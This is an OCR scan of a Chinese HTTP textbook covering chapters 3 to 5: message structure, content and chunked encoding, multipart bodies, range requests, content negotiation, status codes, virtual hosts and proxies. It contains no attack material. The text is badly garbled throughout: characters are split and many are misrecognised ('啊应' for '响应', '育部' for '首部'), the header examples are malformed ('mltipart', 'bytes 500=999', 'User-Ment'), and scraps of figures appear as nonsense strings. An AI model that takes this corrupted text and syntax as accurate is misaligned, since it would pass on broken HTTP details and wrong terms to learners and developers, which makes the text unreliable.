用 于 HTTP 协议 交互 的 信息 被 称 为 HTTP 报 文 。 请 求 端 ( 客户 端 ) 的 
HTTP 报 文 叫做 请 求 报 文 ， 响 应 端 ( 服务 器 端 ) 的 叫做 啊 应 报 文 。HTTP 
报 文本 身 是 由 多 行 (用 CR+LF 作 换 行 符 ) 数据 构成 的 字符 串 文本 。 

HTTP 报 文大 致 可 分 为 报 文 首部 和 报 文 主体 两 块 。 两 者 由 最 初出 现 
的 空 行 4 CR+LF ) 来 划分 。 通 常 ， 并 不 一 定 要 有 报 文 主体 。 

| | 报 文 首部 】 
服务 器 端 或 客户 端 需 处 理 的 请 求 或 响应 的 内 容 及 属性 
【CR+LF] 
CRI Carriage Return， 回 车 符 : 16 进 制 0x0d ) 和 
1 LF( Line Feed, 换行 符 ，16 进 制 0x0a ) 


【 报 文 主体 】 
应 被 发 送 的 数据 


图 : HTTP 报 文 的 结构 





3.2 ”请求 报 文 及 响应 报 文 的 结构 
我 们 来 看 一 下 请 求 报 文 和 响应 报 文 的 结构 。 





图 : 请 求 报 文 ( 上 ) 和 响应 报 文 ( 下 ) 的 结构 
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| User-Ment: Was Po rv:13.0) Gecko/201001 Fox/13.0.: 
: text/ht pplication/xhtml+xml, dy 9,*/*;7q=0.8 

age: Naren- de0. 7;en190. 3 

ing: e a 





图 : 请 求 报 文 ( 上 ) 和 响应 报 文 (下 ) 的 实例 


请 求 报 文 和 啊 应 报 文 的 首部 内 容 由 以 下 数据 组 成 。 现 在 出 现 的 各 种 
育 部 字段 及 状态 但 稍 后 会 进行 曾 述 。 


请 求 行 

包含 用 于 请 求 的 方法 ， 请求 URI 和 HTTP 版 本 。 
状态 行 

包含 表明 响应 结果 的 状态 码 ， 原 因 短语 和 HTTP 版 本 。 
首部 字段 


包含 表示 请 求 和 啊 应 的 各 种 条 件 和 属性 的 各 类 首部 。 





| 加 国 过 
[nnn 





一 ee ee — 


一 般 有 4 种 首部 ， 分 别 是 : 通用 首部 、 请 求 首部 、 啊 应 首部 和 实体 
首部 。 
其 他 

可 能 包含 HTTP 的 RFC 里 未 定义 的 首部 ( Cookie 等 )。 


3.3 ”编码 提升 传输 速率 


HTTP 在 传输 数据 时 可 以 按照 数据 原貌 直接 传输 ， 但 也 可 以 在 传输 
过 程 中 通过 编码 提升 传输 速率 。 通 过 在 传输 时 编码 ， 能 有 效 地 处 理 大 量 
的 访问 请 求 。 但 是 ， 编 码 的 操作 需要 计算 机 来 完成 ， 因 此 会 消耗 更 多 的 
CPU 等 资源 。 


3.3.1 报 文 主体 和 实体 主体 的 差异 
9 报 文 (message ) 
是 HTTP 通信 中 的 基本 单位 ， 由 8 位 组 字 节 流 (octet sequence， 
其 中 octet 为 8 个 比特 ) 组 成 ,通过 HTTP 通信 传输 。 


9 实体 ( enitity ) 
作为 请 求 或 啊 应 的 有 效 载 和 数据 (补充 项 ) 被 传输 ， 其 内 容 由 实 
体 首 部 和 实体 主体 组 成 。 


HTTP 报 文 的 主体 用 于 传输 请 求 或 啊 应 的 实体 主体 。 

通常 ， 报 文 主体 等 于 实体 主体 。 只 有 当 传 输 中 进行 编码 操作 时 ， 实 
体 主体 的 内 容 发 生变 化 ， 才 导致 它 和 报 文 主体 产生 差异 。 

报 文 和 实体 这 两 个 术语 在 之 后 会 经 常 出 现 ， 请 事先 理解 两 者 的 差异 。 


3.3.2 压缩 传输 的 内 容 编 码 
向 待 发 送 邮 件 内 增加 附件 时 ， 为 了 使 邮件 容量 变 小 ， 我 们 会 先 用 
ZIP 压缩 文件 之 后 再 添加 附件 发 送 。HTTP 协议 中 有 一 种 被 称 为 内 容 编 
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码 的 功能 也 能 进行 类 似 的 操作 。 
内 容 编码 指明 应 用 在 实体 内 容 上 的 编码 格式 ， 并 保持 实体 信息 原样 
压 菠 。 认 容 编 码 后 的 实体 由 客户 端 接收 并 负责 解码 。 


把 实体 压缩 变 小 后 发 送 





服务 器 





图 : 内 容 编码 
常用 的 内 容 编码 有 以 下 几 种 。 


和 gzip ( GNU zip) 

s compress ( UNIX 系统 的 标准 压缩 ) 
@ deflate (zlib ) 

9 idenitity | 不 进行 编码 ) 


3.3.3 分割 发 送 的 分 块 传输 编码 

在 HTTP 通信 过 程 中 ， 请 求 的 编码 实体 资源 尚未 全 部 传输 完成 之 
前 ， 浏 览 需 无 法 显示 请 求 页 面 。 在 传输 大 容量 数据 时 ， 通 过 把 数据 分 割 
成 多 块 ， 能 够 让 浏览 器 逐步 显示 页 面 。 

这 种 把 实体 主体 分 块 的 功能 称 为 分 块 传输 编码 ( Chunked Transfer 
Coding )。 


国语 
je 


mn 





z 
先 将 实体 主体 分 割 变 小 分 割 物 称 为 


块 ( chunk | 


< 
二 


硬 
本 十 
二 








图 : 分 块 传输 编码 


分 块 传输 编码 会 将 实体 主体 分 成 多 个 部 分 ( 块 )。 每 一 块 都 会 用 
十 六 进 制 来 标记 块 的 大 小 ， 而 实体 主体 的 最 后 一 块 会 使 用 “0(CR+LF)” 
来 标记 。 

使 用 分 块 传输 编码 的 实体 主体 会 由 接收 的 客户 端 负责 解码 ， 恢 复 到 
编码 前 的 实体 主体 。 

HTTP/1.1 中 存在 一 种 称 为 传输 编码 ( Transfer Coding ) 的 机 制 ， 它 
可 以 在 通信 时 按 茶 种 编码 方式 传输 ， 但 只 定义 作用 于 分 块 传输 编码 中 。 


3.4 ”发 送 多 种 数据 的 多 部 分 对 象 集合 





MIME 多 部 分 对 象 集合 


发 送 邮 件 时 ， 我 们 可 以 在 邮件 里 写 人 文字 并 添加 多 份 附件 。 这 是 因 
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为 来 用 了 MIME ( Multipurpose Internet Mail Extensions， 多 用 途 因 特 网 
邮件 扩展 ) 机 制 ， 它 允许 邮件 处 理 文 本 、 图 片 、 视 频 等 多 个 不 同类 型 的 
数据 。 例 如 ， 图 片 等 二 进 制 数 据 以 ASCII 码 字符 串 编码 的 方式 指明 ， 就 
是 利用 MIME 来 描述 标记 数据 类 型 。 而 在 MIME 扩展 中 会 使 用 一 种 称 
为 多 部 分 对 象 集合 〈( Multipart ) 的 方法 ,来 容纳 多 份 不 同类 型 的 数据 。 
相应 地 ，HTTP 协议 中 也 米 纳 了 多 部 分 对 象 集合 ， 发 送 的 一 份 报 文 
主体 内 可 含有 多 类 型 实体 。 通 常 是 在 图 片 或 文本 文件 等 上 传 时 使 用 .。 
多 部 分 对 象 集合 包含 的 对 象 如 下 。 
@ multipart/form-data 
在 Web 表单 文件 上 传 时 使 用 。 
® multipart/byteranges 
状态 码 206 ( Partial Content， 部 分 内 容 ) 响应 报 文 包含 了 多 个 范 
围 的 内 容 时 使 用 。 


® multipart/form-data 


Content-Type: mltipart/form-data; boundary=AaB03x 


--AaB03x 
Content-Disposition: form-data; name="field1" 


Joe Blow 

--AaB03x 

Content-Disposition: form-data; name="pics"; filename="filel ,txt" 
Content-Type: text /plain 


--. (filel.txt 的 数据 ) ..…. 
--AaBO3x-- 


s Multipart/Dyteranges 


HTTP/1.1 206 Partial Content 


ee 


Date: Fri, 13 Jul 2012 02:45:26 GMT 
Last -Modified: Fri, 31 Aug 2007 02:02:20 GMT 
Content-Type: mltipart/byteranges; boundary=THIS STRING SEPARATES 


--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content -Range: bytes 500=999/8000 


…… ( 范围 指定 的 数据 ) - . - 

--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content-Range: bytes 7000-7999/8000 


…. ( 范围 指定 的 数据 ) .… . 
--THIS STRING SEPARATES-- 


在 HTTP 报 文中 使 用 多 部 分 对 象 集合 时 ,需要 在 首部 字段 里 加 上 

二 。 Content-type。 有 大 这 个 自 部 字段 ， 我 们 和 后 讲解 。 

使 用 boundary 字符 串 来 划分 多 部 分 对 象 集合 指明 的 各 类 实体 。 在 
boundary 字符 串 指定 的 各 个 实体 的 起 始 行 之 前 插 人 “--” 标 记 ( 例 如: 
--AaB03x、--THIS STRING SEPARATES )， 而 在 多 部 分 对 象 集合 对 应 
的 字符 串 的 最 后 插入 “--” 标 记 (例如 : --AaB03x--、--THIS_STRING 
SEPARATES-- ) 作为 结束 。 

多 部 分 对 象 集合 的 每 个 部 分 类 型 中 ， 都 可 以 含有 首部 字段 。 另 外 ， 
可 以 在 某 个 部 分 中 垦 套 使 用 多 部 分 对 象 集合 。 有 关 多 部 分 对 象 集合 更 详 
细 的 解释 ， 请 参考 RFC2046。 


3.5 ”获取 部 分 内 容 的 范围 请 求 


以 前 ， 用 户 不 能 使 用 现在 这 种 高 速 的 带宽 访问 互联 网 ， 当 时 ， 下 载 
一 个 尺寸 稍 大 的 图 片 或 文件 就 已 经 很 吃力 了 。 如 果 下 载 过 程 中 遇 到 网 络 
中 断 的 情况 ， 那 就 必须 重头 开始 。 为 了 解决 上 述 问题 ， 需 要 一 种 可 恢复 
的 机 制 。 所 谓 外 复 是 指 能 从 之 前 下 载 中 断 处 恢复 下 载 。 
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要 实现 该 功能 需要 指定 下 载 的 实体 范围 。 像 这 样 ， 指 定 范围 发 送 的 
请 求 叫 做 范围 请 求 ( Range Request )。 

对 一 份 10 000 字 节 大 小 的 资源 ， 如 果 使 用 范围 请 求 ， 可 以 只 请 求 
5001~10 000 字 节 内 的 资源 。 





GET /tip.jpg HTTP/1.1 
Host: www.usagidesign.jp 
Range: bytes =5001-10000 





HTTP/1.1 206 Partial Content 

Date: Fri, 13 Jul 2012 04:39:17 GMT 
Content -Range: bytes 5001-10000/10000 
Content -Length: 5000 


Content - Ee image/ jpeg 


哪 Es 本寺， 本 6 





执行 范围 请 求 时 ， 会 用 到 首部 字段 Range 来 指定 资源 的 byte 范围 。 
byte 范围 的 指定 形式 如 下 。 
se 5001~10 000 字 节 
Range: bytes=5001-10000 


者 从 5001 字 干 之 后 全 部 的 


Range: bytes=5001- 








@ 从 一 开始 到 3000 字 节 和 5000~7000 字 节 的 多 重 范 围 


Range: bytes=-3000, 5000=7000 


针对 范围 请 求 ， 啊 应 会 返回 状态 码 为 206 Partial Content 的 啊 应 报 
文 。 男 外 ， 对 于 多 重 范 围 的 范围 请 求 ， 响 应 会 在 首部 字段 Content-Type 
标明 multipart/byteranges 后 返回 啊 应 报 文 。 

如 果 服 务 大 问 无 法 啊 应 范围 请 求 ， 则 会 返回 状态 码 200 OK 和 完整 
的 实体 内 容 。 


3.6 ”内 容 协 商 返 回 最 合适 的 内 容 


同一 个 Web 网 站 有 可 能 存在 着 多 份 相同 内 容 的 页 面 。 比 如 英语 版 
和 中 文 版 的 Web 员 面 ， 它 们 内 容 上 虽 相 同 ， 但 使 用 的 语言 却 不 同 。 

当 浏 览 器 的 默认 语言 为 英语 或 中 文 ， 访 问 相 同 URI 的 Web 页 面 时 ， 
则 会 显示 对 应 的 英语 版 或 中 文 版 的 Web 页 面 。 这 样 的 机 制 称 为 内 容 协 
商 ( Content Negotiation )。 


浏览 器 的 默认 语言 为 英语 





显示 英语 页 面 


浏览 器 的 默认 语言 为 中 文 ; 
| (Google 


wns cr 
显示 中 文 页 面 


图 : 访问 http://www.google.com/ 
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内 容 协 商机 制 是 指 客户 端 和 服务 器 端 就 啊 应 的 资源 内 容 进行 交涉 ， 
然后 提供 给 客户 跨 最 为 适合 的 次 源 。 内 容 协 商会 以 啊 应 资源 的 语言 、 字 
符 集 、 编 码 方式 等 作为 判断 的 基准 。 

包含 在 请 求 报 文 中 的 某 些 首部 字段 (如 下 ) 就 是 判断 的 基准 。 这 些 
首部 字段 的 详细 说 明 请 参考 下 一 章 。 


® Accept 

@ Accept-Charset 

® Accept-Encoding 
® Accept-Language 


® Content-Language 


内 容 协商 技术 有 以 下 3 种 类 型 。 





服务 器 驱动 协商 ( Server-driven Negotiation ) 

由 服务 需 端 进行 内 容 协商 。 以 请 求 的 首部 字段 为 参考 ， 在 服务 需 端 
目 动 处 理 。 但 对 用 户 来 说 ， 以 浏览 器 发 送 的 信息 作为 判定 的 依据 ， 
并 不 一 定 能 筛选 出 最 优 内 容 。 


客户 端 驱动 协商 ( Agent-driven Negotiation ) 

由 客户 端 进行 内 容 协 商 的 方式 。 用 户 从 浏览 器 显示 的 可 选项 列表 中 
手动 选择 。 还 可 以 利用 JavaScript 脚本 在 Web 页 面 上 自动 进行 上 述 
选择 。 比 如 按 OS 的 类 型 或 浏览 器 类 型 ， 自 行 切 换 成 PC 版 页 面 或 
手机 版 页 面 。 


透明 协商 ( Transparent Negotiation ) 


是 服务 器 驱动 和 客户 端 驱动 的 结合 体 ， 是 由 服务 器 端 和 客户 端 各 目 
进行 内 容 协商 的 一 种 方法 。 





结果 的 HTTP 状态 码 


退回 


客 己 端 HTTP 请求 的 返回 结果 、 标 记 服 务 器 


态 码 负责 表示 


HTTP 状 


、 通知 出 现 的 错误 等 工作 。 让 我 们 通过 本 章 的 学 


习 ， 好 好 了 解 一 下 状态 码 的 工作 机 制 。 


端的 处 理 是 否 正 第 








ws 


4.1 ”状态 码 告 知 从 服务 器 端 返回 的 请 求 结果 
状态 码 的 职责 是 当 客户 端 向 服务 器 端 发 送 请 求 时 ， 描 述 返回 的 请 求 


结果 。 依 助 状态 码 ， 用 户 可 以 知道 服务 器 端 是 正常 处 理 了 请 求 ， 还 是 出 
现 了 钉 侨 。 


正常 : 状态 码 2XX 









进展 吴 利 ! 


图 : 响应 的 状态 码 可 描述 请 求 的 处 理 结果 


状态 码 如 200 OK， 以 3 位 数字 和 原因 短语 组 成 。 
数字 中 的 第 一 位 指定 了 响应 类 别 ， 后 两 位 无 分 类 。 响 应 类 别 有 以 下 
5 种 。 


表 4-1: 状态 码 的 类 别 


Eee ef 


1XX nferrviatione | 信息 性 状态 码 | | 接收 的 请 求 正在 处 理 


Success | 成 功 状 态 码 ) 请 求 正常 处 理 完 毕 


Redirection ( 重 定向 状态 码 ) 需要 进行 附加 操作 以 完成 请 求 


Client Error ( 客户 疡 错误 状态 码 ) 服务 器 无 法 处 理 请 求 


| 5XX Server Error ( 服务 器 馈 误 状态 码 ) 服务 器 处 理 请 求 出 错 
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只 要 遵守 状态 码 类 别 的 定义 ， 即 使 改变 RFC2616 中 定义 的 状态 人 码 ， 
或 服务 顺 端 和 目 行 创 建 状 态 码 都 没 问题 。 

仅 记 录 在 RFC2616 上 的 HTTP 状 态 码 就 达 40 种 ， 若 再 加 上 
WebDAV ( Web-based Distributed Authoring and Versioning， 基 于 万 维 网 
的 分 布 式 创作 和 版 本 控制 ) ( RFC4918、5842 ) 和 附加 HTTP 状态 码 
( RFC6585 ) 等 扩展 ， 数 量 就 达 60 余 种 。 别 看 种 类 繁多 ， 实际 上 经 常 使 
用 的 大 概 只 有 14 种 。 接 下 来 ， 我 们 就 介绍 一 下 这 些 具有 代表 性 的 14 个 


4.2 2XX 成 功 
2XX 的 啊 应 结果 表明 请 求 被 正常 处 理 了 ，。 


4.2.1 200 OK 






请 求 已 正常 处 理 





老 请 来 正常 处 理 则 返回 200 OK 服务 器 


表示 从 客户 端 发 来 的 请 求 在 服务 器 端 被 正常 处 理 了 。 

在 响应 报 文 内 ， 随 状态 码 一 起 返回 的 信息 会 因 方法 的 不 同 而 发 生 改 
变 。 比 如 ,使 用 GET 方法 时 ， 对 应 请 求 资源 的 实体 会 作为 啊 应 返回 ; 
而 使 用 HEAD 方法 时 ， 对 应 请 求 资源 的 实体 首部 不 随 报 文 主体 作为 响 
应 返回 ( 即 在 响应 中 只 返回 首部 ， 不 会 返回 实体 的 主体 部 分 )。 





ee 


4.2.2 204 No Content 





、 请求 殷 理 成 功 ! 





客户 端 服务 器 


该 状态 码 代表 服务 器 接收 的 请 求 已 成 功 处 理 ， 但 在 返回 的 啊 应 报 文 
中 不 含 实体 的 主体 部 分 。 另 外 ， 也 不 允许 返回 任何 实体 的 主体 。 比 如 ， 
当 从 浏览 器 发 出 请 求 处 理 后 ,返回 204 啊 应 ， 那 么 浏览 器 显示 的 页 面 不 
发 生 更 新 。 

一 般 在 只 需要 从 客户 端 往 服务 器 发 送信 息 ， 而 对 客户 病 不 需要 发 送 
新 信息 内 容 的 情况 下 使 用 。 


4.2.3 206 Partial Content 





明白 ! 峡 对 己 源 时 一 


该 状态 码 表示 客户 端 进行 了 范围 请 求 ， 而 服务 器 成 功 执行 了 这 部 分 
的 GET 请求。 响应 报 文 中 包含 由 Content-Range 指定 范围 的 实体 内 容 。 
4.3 3XX 重 定向 


3XX 响应 结果 表明 浏览 器 需要 执行 某 些 特殊 的 处 理 以 正确 处 理 
请 求 。 
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视 源 曲 URI 已 更 新 。 你 也 更 
新 下 你 的 书 鉴 引用 吧 ? 





需要 进行 书签 
引用 的 变更 


永久 性 重 定 癌 。 该 状态 码 表 示 请 求 的 质 源 已 被 分 配 了 新 的 URI， 以 
后 应 使 用 资源 现在 所 指 的 URI。 也 就 是 说 ， 如 果 已 经 把 资源 对 应 的 URI 
保存 为 书签 了 ， 这 时 应 该 按 Location 首部 字段 提示 的 URI 重新 保存 。 

像 下 方 给 出 的 请 求 URI， 当 指定 资源 路 径 的 最 后 筷 记 添加 斜 杠 
“/"， 就 会 产生 301 状态 码 。 


“http://example.com/sample 


4.3.2 302 Found 






”六 声 曲 URI 已 临时 定位 到 
其 他 位 置 了 ， 姑且 算 你 已 
经 知 通 这 个 情况 3， 






临时 性 重 定向 。 该 状态 码 表示 请 求 的 资源 已 被 分 配 了 新 的 URI， 布 
望 用 户 〈 本 次 ) 能 使 用 新 的 URI 访问 。 





和 301 Moved Permanently 状态 码 相 似 ， 但 302 状态 人 码 代 表 的 资源 
不 是 被 永久 移动 ， 只 是 临时 性 质 的 。 换 句 话 说 ， 已 移动 的 资源 对 应 的 
URI 将 来 还 有 可 能 发 生 改变 。 比 如 , 用 户 把 URI 保存 成 书签 ， 但 不 会 像 
301 状态 码 出 现时 那样 去 更 新 书签 ， 而 是 仍旧 保留 返回 302 状态 码 的 页 
面 对 应 的 URI。 


4.3.3 303 See Other 






次 源 则 URI 已 重新 ， 你 是 否 
能 临时 近 新 的 URI 访问 ? 


客户 端 服务 器 

该 状态 码 表示 由 于 请 求 对 应 的 资源 存在 着 另 一 个 URI， 应 使 用 GET 
方法 定向 获取 请 求 的 资源 。 

303 状态 码 和 302 Found 状态 码 有 着 相同 的 功能 ， 但 303 状态 码 明 
确 表示 客户 端 应 当 采 用 GET 方法 获取 资源 ， 这 点 与 302 状态 码 有 区 别 。 

比如 ， 当 使 用 POST 方法 访问 CGI 程序 ， 其 执行 后 的 处 理 结果 是 希 
望 客户 端 能 以 GET 方法 重 定 癌 到 男 一 个 URI 上 去 时 ， 返 回 303 状态 码 。 
虽然 302 Found 状态 码 也 可 以 实现 相同 的 功能 ， 但 这 里 使 用 303 状态 码 
是 最 理想 的 。” 


QD 本 书 采用 的 是 HTTP/1.1, 而 许多 HTTP/1.1 版 以 前 的 浏览 器 不 能 正确 理解 303 
状态 码 。 虽 然 RFC 1945 和 RFC 2068 规 范 不 允许 客户 端 在 重 定向 时 改变 请 求 
的 方法 ， 但 是 很 多 现存 的 浏览 器 将 302 响 应 视 为 303 响应， 并 且 使 用 GET 方 
式 访问 在 Location 中 规定 的 URI， 而 无 视 原 先 请 求 的 方法 。 所 以 作者 说 这 里 
使 用 303 是 最 理想 的 。 一 一 译 者 注 
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兆 亚 
EE jm 过 
当 301、302、303 响应 状态 码 返 回 时 ， 几 乎 所 有 的 浏览 器 都 会 把 
POST 改 成 GET， 并 删除 请 求 报 文 内 的 主体 ， 之 后 请 求 会 自动 再 次 发 送 。 
301、302 标准 是 禁止 将 POST 方法 改变 成 GET 方法 的 ， 但 实际 使 用 
时 大 家 都 会 这 么 做 。 


4.3.4 304 Not Modified 






附带 条 件 的 请 求 


客户 只 缓存 服务 器 


该 状态 码 表示 客户 端 发 送 附 带 条 件 的 请 求 ” 时 ， 服 务 器 端 允 许 请 求 
访问 资源 , 但 未 满足 条 件 的 情况 。304 状态 码 返 回 时 ， 不 包含 任何 啊 应 
的 主体 部 分 。304 虽然 被 划分 在 3XX 类 别 中 ,但 是 和 重 定 癌 没有 关系 。 





4.3.5 307 Temporary Redirect 

临时 重 定向 。 该 状态 码 与 302 Found 有 着 相同 的 含义 。 尽 管 302 标 
准 禁止 POST 变换 成 GET， 但 实际 使 用 时 大 家 并 不 遵守 。 

307 会 遵照 浏览 器 标准 ， 不 会 从 POST 变 成 GET。 但 是 ， 对 于 处 理 
啊 应 时 的 行为 ， 每 种 浏览 瘟 有 可 能 出 现 不 同 的 情况 。 


(D 附带 条 件 的 请 求 是 指 采用 GET 方 法 的 请 求 报 文中 包含 If-Match，If-Modified- 
Since，I[f-None-Match，If-Range，If-Unmodified-Since 中 任 一 首部 。 


ee 


4.4 4XX 客户 端 错误 
4XX 的 响应 结果 表明 客户 端 是 发 生 错误 的 原因 所 在 。 


4.4.1 400 Bad Request 










我 无 法 理解 这 个 请 
求 ， 是 不 是 圈 了 ? 


i a 
| 


该 状态 码 表示 请 求 报 文 中 存在 语法 错误 。 当 错误 发 生 时 ， 需 修改 请 求 
的 内 容 后 再 次 发 送 请 求 。 另 外 ， 浏 览 器 会 像 200 OK 一 样 对 待 该 状态 码 。 


4.4.2 401 Unauthorized 


第 2 次 返回 401 


( 请 求 中 已 包含 Authorization 
credentials ) 


Authorization Required 

This server could not verify that you are authorized to 
access the document requested. Either you supplied the 
Wrong credentials le.g., bad password), or Your browser 
doesn't understand how to supply the credentials required. 
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该 状态 码 表示 发 送 的 请 求 需 要 有 通过 HTTP 认证 ( BASIC 认证、 
DIGEST 认证 ) 的 认证 信息 。 另 外 若 之 前 已 进行 过 1 次 请 求 ， 则 表示 用 
户 认 证 失败 。 

返回 含有 401 的 响应 必须 包含 一 个 适用 于 被 请 求 资源 的 WWW- 
Authenticate 首部 用 以 质询 ( challenge ) 用 户 信息 。 当 浏览 各 初 次 接收 
到 401 响应 ， 会 弹出 认证 用 的 对 话 窗 口 。 


4.4.3 403 Forbidden 






下 和 人 许 访 间 那 个 
”” 痪 湛 呆 





该 状态 码 表明 对 请 求 资源 的 访问 被 服务 硕 拒 绝 了 。 服 务 角 病 没 有 必 
要 给 出 拒绝 的 详细 理由 , 但 如 果 想 作 说 明 的 话 ， 可 以 在 实体 的 主体 部 分 
对 原因 进行 描述 ， 这 样 就 能 让 用 户 看 到 了 。 

未 获得 文件 系统 的 访问 授权 ， 访 问 权 限 出 现 茶 些 问 题 (从 未 授权 的 
发 送 源 PP 地 址 试图 访问 ) 等 列举 的 情况 都 可 能 是 发 生 403 的 原因 。 


4.4.4 404 Not Found 






Not Found bm 


”The requested URL /a was not found on this server. 


该 状态 码 表明 服务 器 上 无 法 找到 请 求 的 资源 。 除 此 之 外 ， 也 可 以 在 
服务 顺 问 拒绝 请 求 且 不 想 说 明理 由 时 使 用 。 


4.5 5XX 服务 器 错误 
5XX 的 响应 结果 表明 服务 器 本 身 发 生 错 误 。 


4.5.1 500 Internal Server Error 







编 似 ， 内 部 书 源 出 


该 状态 码 表明 服务 器 端 在 执行 请 求 时 发 生 了 错误 。 也 有 可 能 是 Web 
应 用 存在 的 bug 或 某 些 临时 的 故障 。 


4.5.2 503 Service Unavailable 


″ 相 靳 ， 现 在 我 正 民 着 ， 


客户 应 服务 北 


该 状态 码 表 明 服 务 顺 暂时 处 于 超 负 载 或 正在 进行 停机 维护 ， 现 在 无 
法 处 理 请 求 。 如 果 事 先 得 知 解 除 以 上 状况 需要 的 时 间 ， 最 好 写 人 Retry- 
After 首部 字段 再 返回 给 客户 问 。 
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第 5 章 
与 HTTP 协作 的 Web 服务 器 


一 全 Web 服 务 器 可 搭建 多 个 独立 域名 的 Web 网 站 ,也 可 作为 通信 
路 径 上 的 中 转 服 务 怖 提升 传输 效率 。 





aaaaaaasa 


Gr 


5.1 用 单 台 虚 拟 主 机 实现 多 个 域名 


HTTP/1.1 规范 允许 一 台 HTTP 服务 需 搭 建 多 个 Web 站 点 。 比 如 ， 
提供 Web 托管 服务 ( Web Hosting Service ) 的 供应 商 ， 可 以 用 一 人 台 服 务 
兢 为 多 位 客户 服务 ， 也 可 以 以 每 位 客户 持 有 的 域名 运行 各 目 不 同 的 网 站 。 
这 是 因为 利用 了 虚拟 主机 ( Virtual Host， 又 称 虚拟 服务 器 ) 的 功能 。 

即使 物理 层面 只 有 一 台 服 务 器 ， 但 只 要 使 用 虚拟 主机 的 功能 ， 则 可 
以 假想 已 具有 多 人 台 服 务 硕 。 





虚拟 主机 
WY.hackr.ip 


虚拟 主机 


xss.hackr.jp 


客户 端 使 用 HTTP 协议 访问 服务 硕 时 ， 会 经 种 来 用 类 似 www.hackr. 
jp 这样 的 主机 名 和 域名 。 

在 互联 网 上 ， 域 名 通过 DNS 服务 映射 到 IP 地址 (域名 解析 ) 之 后 
访问 目标 网 站 。 可 见 ， 当 请 求 发 送 到 服务 第 时 ， 已 经 是 以 下 地 址 形 云 
访问 了 。 

所 以 ， 如 果 一 人 台 服 务 天 内 托管 了 www.tricorderjp 和 www.hackrjp 
这 两 个 域名 ， 当 收 到 请 求 时 就 需要 弄 清楚 究竟 要 访问 哪个 域名 。 
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若 www:tricorderjp 和 www.hackrjp 同 时 部 署 在 同一 个 服务 
器 上 ( 相同 的 IP 地 址 ), 使 用 DNS 服务 解析 域名 后 ,两 者 的 访 
问 IP 地 址 会 相同 。 


师 PP 


在 相同 的 下 地 址 下 ， 由 于 虚拟 主机 可 以 寄存 多 个 不 同 主机 名 和 域 
名 的 Web 网 站 ， 因 此 在 发 送 HTTP 请 求 时 ， 必 须 在 Host 首部 内 完整 指 
定 主 机 名 或 域名 的 URI。 


5.2 ”通信 数据 转发 程序 : 代理 、 网 关 、 隧 道 


HTTP 通信 时 ， 除 客户 端 和 服务 器 以 外 ， 还 有 一 些 用 于 通信 数据 转 
发 的 应 用 程序 ， 例 如 代理 、 网 关 和 隧道 。 它 们 可 以 配合 服务 器 工作 。 

这 些 应 用 程序 和 服务 器 可 以 将 请 求 转发 给 通信 线路 上 的 下 一 站 服务 
句 ， 并 且 能 接收 从 那 台 服务 器 发 送 的 响应 再 转发 给 客户 端 。 


代理 

代理 是 一 种 有 转发 功能 的 应 用 程序 ， 它 扮演 了 位 于 服务 器 和 客户 端 
“中 间 人 ”的 角色 ， 接 收 由 客户 端 发 送 的 请 求 并 转发 给 服务 器 ， 同 
时 也 接收 服务 天 返回 的 啊 应 并 转发 给 客户 端 。 


网 天 

网 关 是 转发 其 他 服务 器 通信 数据 的 服务 器 ， 接 收 从 客户 端 发 送 来 的 
请 求 时 ， 它 就 像 自 己 拥有 资源 的 源 服务 器 一 样 对 请 求 进行 处 理 。 有 
时 客户 端 可 能 都 不 会 察觉 ， 目 己 的 通信 目标 是 一 个 网 关 。 





i 


隘 瑟 
隧 姓 是 在 相隔 其 远 的 客户 端 和 服务 器 两 者 之 间 进 行 中 转 ， 并 保持 双 
方 通信 连接 的 应 用 程序 。 





代理 服务 右 的 基本 行为 就 是 接收 客户 端 发 送 的 请 求 后 转发 给 其 他 
服务 器 。 代 理 不 改变 请 求 URI， 会 直接 发 送 给 前 方 持 有 资源 的 目标 服 
务 髓 。 

持 有 质 源 实体 的 服务 器 被 称 为 源 服 务 器 。 从 源 服务 器 返回 的 响应 经 
过 代理 服务 器 后 再 传 给 客户 端 。 


GET7 HTTP/1.1 ! GET/HTTP/. 下 
Via: prowyl | Via: ys proxy], 
CA vy | 


r HTTP/1.1 200 OK, | HTTP/1.1 200 OK 
IVia: proxy2, proxy1， | Via: proxy2 





图 : 每 次 通过 代理 服务 器 转发 请 求 或 响应 时 ， 会 追加 写 入 Via 首部 信息 


在 HITP 通信 过 程 中 ， 可 级 联 多 台 代 理 服务 器 。 请 求 和 响应 的 转发 
会 经 过 数 台 类 似 锁链 一 样 连接 起 来 的 代理 服务 器 。 转 发 时 ， 需 要 附加 
Via 首部 字段 以 标记 出 经 过 的 主机 信息 。 
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一 一 一 am 一 一 一 














代理 服务 器 


通过 设置 组 织 内 部 的 代理 服务 器 可 做 到 针对 特定 URI 访 问 的 控制 。 


使 用 代理 服务 器 的 理由 有 : 利用 缓存 技术 ( 稍 后 讲解 ) 减少 网 络 带 
宽 的 流量 ， 组 织 内 部 针对 特定 网 站 的 访问 控制 ， 以 获取 访问 日 志 为 主要 
目的 ， 等 等 。 

代理 有 多 种 使 用 方法 ， 按 两 种 基准 分 类 。 一 种 是 是 否 使 用 缓存 ,为 
一 种 是 是 否 会 修改 报 文 。 


缓存 代理 

代理 转发 啊 应 时 ， 缓 存 代 理 ( Caching Proxy ) 会 预先 将 资源 的 副本 
(缓存 ) 保存 在 代理 服务 器 上 。 

当代 理 再 次 接收 到 对 相同 资源 的 请 求 时 ， 就 可 以 不 从 源 服务 佛 那 里 
获取 摧 源 ， 而 是 将 之 前 组 存 的 质 源 作为 啊 应 返回 。 





透明 代理 

转发 请 求 或 响应 时 ， 不 对 报 文 做 任何 加 工 的 代理 类 型 被 称 为 透明 代 
理 (Transparent Proxy )。 反 之 ， 对 报 文 内 容 进行 加 工 的 代理 被 称 为 
非 透明 代理 。 


HTTP 请 求 


J 


HTTP 响应 网 关 非 HTTP 服 务 器 





图 : 利用 网 关 可 以 由 HTTP 请 求 转化 为 其 他 协议 通信 


网 关 的 工作 机 制 和 代理 十 分 相似 。 而 网 关 能 使 通信 线路 上 的 服务 需 
提供 非 HTTP 协议 服务 。 

利用 网 关 能 提高 通信 的 安全 性 ， 因 为 可 以 在 客户 端 与 网 关 之 间 的 通 
信 线 路 上 加 密 以 确保 连接 的 安 人 全。 比如， 网关 可 以 连接 数据 库 ， 使 用 
SQL 语句 查询 数据 。 男 外 ， 在 Web 购物 网 站 上 进行 信用 卡 结算 时 ， 网 
关 可 以 和 信用 卡 结算 系统 联动 。 


5.2.3 ”隧道 

